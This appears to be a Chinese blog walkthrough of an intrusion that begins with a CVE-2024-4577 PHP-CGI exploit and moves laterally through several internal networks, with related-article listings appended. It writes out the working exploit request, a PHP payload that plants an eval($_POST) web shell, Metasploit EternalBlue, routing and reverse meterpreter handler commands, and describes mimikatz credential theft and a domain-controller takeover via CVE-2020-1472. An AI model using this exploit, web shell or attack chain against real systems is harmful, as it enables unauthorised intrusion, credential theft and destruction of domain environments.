通过CVE-2024-4577 PHP CGI 远程代码执行入口的一次渗透

最新推荐文章于 2024-10-21 16:49:08 发布
原创 最新推荐文章于 2024-10-21 16:49:08 发布 · 3k 阅读 · 33 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #web安全 #系统安全

访问http://目标IP/dashboard/发现时是XAMPP搭建的web环境,利用最近刚爆出的**PHP远程代码执行(CVE-2024-4577)**漏洞进行攻击
在这里插入图片描述
POC-EXP

POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1

<?php die("Te"."sT");?>

<?php file_put_contents('..\htdocs\xj.php', '<?php eval($_POST["pass"]);?>');?>

通过BP或者postman等工具构造数据包验证是否存在
在这里插入图片描述
使用exp上传木马,这里要注意文件上传的位置

*XAMPP的常用路径*

网站根目录的默认路径:xampp\htdocs

执行chdir命令发现当前位于 C:\xampp\php
在这里插入图片描述
所以文件上传位置应该为 …\htdocs\xj.php

<?php file_put_contents('..\htdocs\xj.php', '<?php eval($_POST["pass"]);?>');?>

访问
在这里插入图片描述
木马成功写入,使用webshell工具连接
在这里插入图片描述
这里为了后续操作,直接上传远控木马进行上线操作
在这里插入图片描述

由于是第三方中间件搭建的web环境,拿到一个高权限,暂时不用考虑提权

做个信息收集:

可以看到还有一个内网地址192.168.2.0网段,直接进行扫描,看看存活哪些主机

当前拿下的主机内网ip为192.168.2.140在这里插入图片描述
扫到一台主机192.168.2.128
在这里插入图片描述
信息收集发现开放了 445 永恒之蓝ms17010漏洞利用端口

验证是否存在ms17010漏洞
在这里插入图片描述
CS设置
在这里插入图片描述
msf设置
在这里插入图片描述
添加路由

run autoroute -p //查看当前路由表

run post/multi/manage/autoroute //添加当前路由表

利用

use exploit/windows/smb/ms17_010_eternalblue
在这里插入图片描述
由于需要192.168.2.140作为反连接受shell主机,因为攻击目标处于内网,不能直接与我们攻击服务器进行通讯需要在192.168.2.140进行以下操作(设置一个接收shell)

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_http

set lhost 192.168.2.140

set lport 4444

exploit -j

在这里插入图片描述
成功拿下对应主机,为了后续方便,这里依旧将权限移交给CS
在这里插入图片描述
同样对端口和内网段存活主机进行一个探测

出现新目标
在这里插入图片描述
由于是win7系统,可以尝试抓明文密码,这里mimikatz抓取到了密码,尝试横向移动192.168.2.129
在这里插入图片描述
这里需要注意一个木马的正反向,如果是用反向,应该以192.168.2.140为反连IP,如果想要利用192,168.2.128攻击,只能使用正向bind木马攻击,因为192.168.2.128开启了防火墙,而192.168.2.129并未设置防火墙
在这里插入图片描述
成功拿下192.168.2.129主机

同样操作,进行信息收集,探测
在这里插入图片描述
出现192.168.3.0新网卡,进行端口,IP扫描存活主机
在这里插入图片描述

3.128是刚刚拿下的主机,所以3.133则是下一个目标
在这里插入图片描述
可以看到,192.168.3.133开放了7001端口,这个端口一般就是weblogic的默认端口,但由于搭建在内网,我们无法直接访问,但刚刚拿下的192.168.3.128这台主机是能够进行通讯的,我们将其作为跳板机,建立代理进行攻击
在这里插入图片描述
成功本地访问到目标内网服务,由于是weblogic,尝试一个Nday利用

存在
在这里插入图片描述
执行命令没问题
在这里插入图片描述
为了后续利用,还是想办法让他上线到远控工具,这里有web服务,进行文件上传较为简单,但需要知道一个网站目录,但我们已经可以执行命令,所以还是可以找到的

C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain

这里不清楚为什么不能,可能目录还是不对,所以换了一个方法,直接植入内存马
在这里插入图片描述

成功

传马上线,由于192.168.3.133有防火墙,采用反向到192.168.3.128
在这里插入图片描述

成功上线
在这里插入图片描述

新发现192.168.10.0
在这里插入图片描述

mimikatz抓取到了一个明文密码,再次尝试横向移动在这里插入图片描述

由于weblogic存在防火墙,使用正向攻击192.168.10.12 横向移动
在这里插入图片描述

在这里插入图片描述
探测,net group “domain controllers” /domain 发现该主机处于域内环境,定位域控,

mimikatz抓取明文密码未成功,高版本禁止了,尝试域控提权,ms14068,CVE-2021-42287,CVE-2022-26923均不行,只有CVE-2020-1472可以利用,但该漏洞会将域内环境直接破坏(由于第一次操作时重置了域控密码,导致域内环境被破坏,无法进行复现),实操尽量多注意,至此,全部拿下

Xiao3jin
关注
PHP-CGI Windows平台远程代码执行漏洞(CVE-2024-4577)
李同學的安全圈
06-11 3022
PHP 在设计时忽略 Windows 中对字符转换的Best-Fit 特性,当 PHP-CGI 运行在Window平台且使用了如下语系(简体中文936/繁体中文950/日文932等)时,攻击者可构造恶意请求绕过 CVE-2012-1823 补丁,从而可在无需登陆的情况下执行任意PHP代码。
web安全渗透测试工具篇(一):快速发现漏洞之漏洞综合扫描和联动
HACKONE的博客
05-24 1182
Burpsuite,Awvs,Xray,Goby,Afrog,Yakit,Nuclei,Vulmap,Pocassist,Nessus,Pentestkit,Kunyu,Pocsuite3,浏览器各类插件,Burpsuite插件(HaE,ShiroScan,FastJsonScan,Log4j2Scan,Springscan,JScan等)。Acunetix一款商业的Web漏洞扫描程序,它可以检查Web应用程序中的漏洞,如SQL注入、跨站脚本攻击、身份验证页上的弱口令长度等。
CVE-2024-4577PHP CGI 远程代码执行漏洞
qq_21039641的博客
06-08 2587
PHP 语言在设计时忽略Windows 作业系统内部对字元编码转换的Best-Fit特性,导致未认证的攻击者可透过特定的字元序列绕过旧有。的保护,透过参数注入等攻击在远端PHP 服务器上执行任意代码。
PHP-CGI Windows平台远程代码执行漏洞复现(CVE-2024-4577)
weixin_45653478的博客
06-27 1563
CVE-2024-4577是一个在Windows平台上运行的PHP CGI(Common Gateway Interface)的远程代码执行漏洞。该漏洞的存在主要是因为PHP在设计时未能预见到Windows系统的Best-Fit字符编码转换特性,导致攻击者可以通过构造特定的请求来绕过安全限制,从而在远程PHP服务器上执行任意代码。
XAMPP默认环境CVE-2024-4577 PHP CGI 远程代码执行漏洞复现
m0_74321564的博客
08-25 3492
XAMPP默认环境CVE-2024-4577 PHP CGI 远程代码执行漏洞复现,CVE-2024-4577是一个影响在Windows平台上运行的PHP CGI远程代码执行漏洞。 漏洞的存在是因为PHP在设计时未能预见到Windows的Best-Fit字符编码转换特性,这使得攻击者可以通过构造特定的请求来绕过安全限制。受影响的环境包括使用特定语系设置的Windows系统,如简体中文(936)、繁体中文(950)和日文(932)
漏洞复现-PHP-CGI Windows平台远程代码执行漏洞(CVE-2024-4577
玄道的网安博客
08-12 2149
语言在设计时忽略了Windows系统内部对字符编码转换的Best-Fit特性,当PHP运行在Window平台且使用了如繁体中文(代码页950)、简体中文(代码页936)和日文(代码页932)等语系时,威胁者可构造恶意请求绕过CVE-2012-1823的保护,通过参数注入等攻击在目标PHP服务器上远程执行代码。结合上面的特性,你可以通过传%ad来传入一个"-",这样在-之后的部分就会成为php-cgi的参数。只有php-cgi.exe是granted的,我们把视角还是回到php-cgi上。
【漏洞复现】PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)
最新发布
m0_46381222的博客
10-21 1073
【漏洞复现】PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)
php cgi漏洞利用工具 源代码
01-22
这个漏洞存在于Apache HTTP Server 2.2版本中,当处理特定的CGI请求时,可能会导致远程代码执行CVE-2012-1823是这个漏洞的官方识别号,CVE(Common Vulnerabilities and Exposures)系统用于记录和跟踪网络安全...
Web渗透测试-实战 方法 思路 总结
热门推荐
m0_55595611的博客
02-21 1万+
尽可能的搜集目标的信息 端口信息 DNS信息 员工邮箱 信息搜集的分类 1、主动式信息搜集(可获取到的信息较多,但易被目标发现) 2、通过直接发起与被测目标网络之间的互动来获取相关信息,如通过Nmap扫描目标系统。 3、被动式信息搜集(搜集到的信息较少,但不易被发现) 4、通过第三方服务来获取目标网络相关信息。如通过搜索引擎方式来搜集信息。 搜索引擎 Google hacking 常用搜索语法: intitle:KEYWORD //搜索网页标题中含有关键词的网页 intext:KEYWORD //搜索站
渗透测试漏洞大全
2301_76786857的博客
06-13 1775
由于开发人员编写源码,开放着将可重复使用的代码插入到单个的文件中,并在需要的时候将它们包含在特殊的功能代码文件中,然后包含文件中的代码会被解释执行。应用需要对输入进行检查,不允许用户直接提交未经过验证的数据到服务器,因为这些数据来不可编辑的控件,或者用户没有前端提交的权限,任何可编辑控件必须有阻止恶意的写入或修改的功能。网站登录失败、账号注册、密码找回等功能,有些网站会提示类似“用户名不存在”的错误,攻击者可以通过该提示先猜测出系统存在哪些账号,然后再进一步猜测密码,降低了暴力破解的成本。
渗透测试入门—— 常见术语概述
weixin_46694260的博客
12-26 9808
00x1 前言 刚入门小白,收集了一些渗透术语,废话不多说。 00x2 渗透术语 1.脚本 动态网站(如:asp,php,jsp), linux, python 2.网站 2.1静态网站:与后台交互比较少,如html) 2.2动态网站:使用动态脚本编写 如:asp,php,jsp,交互方便但是安全性不高,如果代码过滤不严格可能会导致漏洞最终导致后台linux被别人随意操作 3.http协议 http(HyperText Transfer Protocol),超文本传输协议。是因特网上应用最为广泛的一种网络传
SRC挖掘日常3
jennycisp的博客
05-06 1076
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。如果你把每周要学的内容精细化到这种程度,你还会担心学不会,入不了门吗,其实说到底就是学了两个月,但都是东学一下,西学一下,什么内容都是浅尝辄止,没有深入进去,所以才会有学了2个月,入不了门这种感受。聊完宏观的,我们再落到具体的技术点上来,给你看看我给团队小伙伴制定的网络安全学习路线,整体大概半年左右,具体视每个人的情况而定。
CVE-2024-4577PHP CGI Windows平台远程代码执行漏洞
薛定谔嘚喵博客
06-11 642
PHP语言在设计时忽略了Windows系统内部对字符编码转换的Best-Fit特性,当PHP运行在Window平台且使用了如繁体中文(代码页950)、简体中文(代码页936)和日文(代码页932)等语系时,威胁者可构造恶意请求绕过CVE-2012-1823的保护,通过参数注入等攻击在目标PHP服务器上远程执行代码。
PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)复现
fly夏天的博客
06-14 2183
PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)复现
CVE-2024-4577 PHP-CGI漏洞
好记性不如烂笔头
06-14 4148
CVE-2024-4577 PHP-CGI漏洞分析。有几个点需要了解一下(1)PHP CGI是什么 (2)CVE-2012-1823是什么漏洞 (3)Windows的“Best-Fit”特性是什么?为什么能利用它绕过CVE-2012-1823的修复 (4)PHP CGI重定向配置问题
探秘PHP安全新挑战:CVE-2024-4577漏洞利用工具深度剖析
gitblog_00069的博客
06-18 730
探秘PHP安全新挑战:CVE-2024-4577漏洞利用工具深度剖析 去发现同类优质开源项目:https://gitcode.com/ 在网络安全的无尽战场上,每一个细节都可能成为攻防转换的关键。今天,我们将深入探讨一个由@watchTowr精心打造的开源项目,该工具专注于演示并利用名为CVE-2024-4577PHP CGI注入漏洞,在Windows环境下实现远程代码执行(RCE)。让我们一探...
PHP_CGL远程代码执行漏洞复现CVE-2024-4577(含批量检测脚本)
2301_79406077的博客
07-31 822
CVE-2024-4577是一个影响在Windows平台上运行的PHP CGI远程代码执行漏洞。漏洞的存在是因为PHP在设计时未能预见到Windows的Best-Fit字符编码转换特性,这使得攻击者可以通过构造特定的请求来绕过安全限制。受影响的环境包括使用特定语系设置的Windows系统,如简体中文(936)、繁体中文(950)和日文(932)。
XAMPP PHP-CGI 远程代码执行漏洞(CVE-2024-4577)
【Rainbow Network Technology co., LTD】
06-15 1735
2024 年 6 月 7 日,推特安全上 orange 公开了其漏洞 CVE-2024-4577 细节,并且 PHP 官方已修复该漏洞。该漏洞仅适用于 php 版本为 8.1 < 8.1.29,PHP 8.2 < 8.2.20,PHP 8.3 < 8.3.8,同时在 php-cgi 模式下运行 php,并且运行在 windows 平台,且使用语系为繁体中文 950、日文 932、简体中文 936 等。
如何检测CVE-2024-38077漏洞:Windows远程代码执行
CVE-2024-38077是一个特定的安全漏洞标识,它指的是在Windows远程桌面授权服务中发现的远程代码执行漏洞。此类漏洞允许攻击者通过远程桌面协议(RDP)在目标系统上执行任意代码。这种安全漏洞的严重性很高,因为攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值